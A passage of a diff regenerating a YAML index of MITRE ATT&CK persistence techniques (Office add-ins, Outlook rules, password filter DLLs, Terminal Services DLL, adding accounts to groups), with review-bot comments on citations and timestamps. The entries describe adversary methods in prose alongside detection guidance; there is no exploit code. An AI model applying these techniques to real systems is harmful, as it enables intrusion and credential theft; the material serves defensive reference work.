x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -29020,6 +29393,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
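Review bot: the new `Hexacorn DLL Hijacking` reference matches the citation token inserted into the T1574.001 description above, so the citation resolves. Since this reference block is being touched anyway, the adjacent `Microsoft Security Advisory 2269637` entry still has an empty year, `Microsoft. (, May 23).`; if the text is mirrored from upstream that is an upstream fix, otherwise it is worth correcting here.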
@@ -29047,42 +29424,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
@@ -29097,13 +29443,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
@@ -29111,11 +29462,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests: []
T1505.002:
@@ -29146,7 +29520,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
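Review bot: the `modified` timestamp for T1505.002 goes backwards, from 2022-04-25 to 2021-10-18, while every other entry in this change moves forward to 2024. Together with the removal of `spec_version: '2.1'` from every object, this looks like the generator switched to a different source bundle rather than an edit to this technique; confirm that is intended and say so in the commit message, because consumers that use `modified` to detect updated techniques will read this as a regression.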
@@ -29184,13 +29558,11 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
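Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1505.002 but, unlike the other entries, nothing in the visible diff re-adds a 3.2.0 value, and the entry keeps the `x_mitre_permissions_required` list (SYSTEM, Administrator, root) that the T1137, T1137.006 and T1556.002 entries drop. Check that the regenerated T1505.002 object still carries `x_mitre_attack_spec_version`, and whether the retained permissions field is a deliberate difference or a sign that this object came from an older source than its neighbours.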
@@ -29216,7 +29588,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -29258,7 +29630,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -29336,11 +29707,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29420,35 +29790,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -29472,71 +29817,60 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
@@ -29545,24 +29879,56 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests: []
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
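Review bot: the `James TermServ DLL` reference changes its URL from twitter.com to x.com with a fresh retrieval date of September 12, 2024. A single social-media post is a fragile source for the termsrv.dll replacement claim; since this change already pins the `Chrome Extension C2 Malware` reference to a web.archive.org snapshot, the same treatment here would keep the citation resolvable if the post disappears. Otherwise the hunk is a straight re-emission of the T1505.005 object with `x_mitre_attack_spec_version` bumped from 2.1.0 to 3.2.0 and `x_mitre_version` unchanged at '1.0'.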
@@ -29654,8 +30020,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -29686,71 +30052,139 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests: []
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
